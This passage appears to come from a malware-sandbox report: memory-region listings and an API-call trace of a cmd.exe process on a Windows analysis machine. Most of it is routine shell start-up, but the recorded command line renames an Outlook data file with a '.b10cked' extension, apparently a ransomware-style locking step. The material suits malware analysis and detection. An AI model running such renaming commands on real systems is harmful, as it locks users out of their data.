end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29310 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29311 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29312 start_va = 0x77470000 end_va = 0x77470fff entry_point = 
0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29313 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29314 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 29315 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30173 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30174 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30175 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30176 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 30177 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 30178 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30179 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30180 start_va = 0x76480000 end_va = 0x76489fff entry_point 
= 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30181 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30182 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30183 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30184 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30185 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30186 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30187 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 30188 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30189 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 
(normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30190 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30191 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 30192 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30193 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30194 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 30195 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 30196 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 30270 start_va = 0x12d0000 end_va = 0x138ffff entry_point = 0x12d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 669 os_tid = 0xeac [0204.299] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f92c | out: lpSystemTimeAsFileTime=0x12f92c*(dwLowDateTime=0xae94f7a0, dwHighDateTime=0x1d440a9)) [0204.299] GetCurrentProcessId () returned 0xe20 [0204.299] GetCurrentThreadId () returned 0xeac [0204.299] GetTickCount () returned 0x39961 [0204.299] QueryPerformanceCounter (in: lpPerformanceCount=0x12f924 | out: lpPerformanceCount=0x12f924*=26108880003) returned 1 [0204.300] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.300] __set_app_type (_Type=0x1) [0204.300] __p__fmode () returned 
0x76b331f4 [0204.301] __p__commode () returned 0x76b331fc [0204.301] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.301] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.301] GetCurrentThreadId () returned 0xeac [0204.301] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeac) returned 0x38 [0204.301] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.301] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.301] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.301] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.301] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f8bc | out: phkResult=0x12f8bc*=0x0) returned 0x2 [0204.301] VirtualQuery (in: lpAddress=0x12f8f3, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.302] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.302] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.302] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, 
RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.302] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.302] GetConsoleOutputCP () returned 0x1b5 [0204.302] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.302] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.302] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.302] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.302] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.302] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.302] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.302] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.303] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.303] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.303] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.303] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.303] GetEnvironmentStringsW () returned 0x270180* [0204.303] FreeEnvironmentStringsW (penv=0x270180) returned 1 [0204.303] GetEnvironmentStringsW () returned 0x270180* [0204.303] FreeEnvironmentStringsW (penv=0x270180) returned 1 [0204.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e82c | out: phkResult=0x12e82c*=0x40) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0xa8, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x1, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x1, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x0, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x40, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x40, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x40, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegCloseKey (hKey=0x40) returned 0x0 [0204.304] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e82c | out: phkResult=0x12e82c*=0x40) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x40, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e834, 
lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x1, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x1, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x0, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x9, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x9, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x9, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegCloseKey (hKey=0x40) returned 0x0 [0204.304] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.304] srand (_Seed=0x5b8863a6) [0204.305] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"" [0204.305] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"" [0204.305] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.305] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2718e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.306] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.306] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.306] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.306] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.306] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.306] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.306] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.306] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.306] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.306] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.306] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.306] GetEnvironmentStringsW () returned 0x2722d0* [0204.306] FreeEnvironmentStringsW (penv=0x2722d0) returned 1 [0204.306] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.306] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.307] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.307] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.307] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.307] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.307] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.307] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.307] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.307] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.307] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f5f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.307] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f5f8, lpFilePart=0x12f5f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f5f4*="Desktop") returned 0x18 [0204.307] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.307] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f374 | out: lpFindFileData=0x12f374) returned 0x270010 [0204.307] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0204.308] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f374 | out: lpFindFileData=0x12f374) returned 0x270010 [0204.308] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0204.308] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f374 | out: lpFindFileData=0x12f374) returned 0x270010 [0204.308] FindClose (in: hFindFile=0x270010 | out: hFindFile=0x270010) returned 1 [0204.308] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.308] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.308] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.308] GetEnvironmentStringsW () returned 0x272af0* 
[0204.309] FreeEnvironmentStringsW (penv=0x272af0) returned 1 [0204.309] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.309] GetConsoleOutputCP () returned 0x1b5 [0204.309] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.309] GetUserDefaultLCID () returned 0x409 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f738, cchData=128 | out: lpLCData="0") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f738, cchData=128 | out: lpLCData="0") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f738, cchData=128 | out: lpLCData="1") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0204.310] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.310] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.311] GetConsoleTitleW (in: lpConsoleTitle=0x2608e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.675] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.675] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.675] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.676] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.676] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.676] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.676] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.676] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0204.676] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.676] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.680] GetConsoleTitleW (in: lpConsoleTitle=0x12f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.898] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.898] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.898] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.898] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.898] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.898] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.898] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.898] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.898] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.898] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.899] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0204.899] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.899] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.899] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.899] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.899] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.899] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.899] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.899] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.899] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.899] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.899] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.899] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.899] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.899] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.899] _wcsicmp (_String1="move", _String2="VER") returned -9 [0204.899] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.899] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.899] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.900] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.900] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.900] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.900] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.900] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.900] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.902] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f1ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f1e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f1e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.902] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.902] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.903] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.903] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.903] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.903] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.904] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
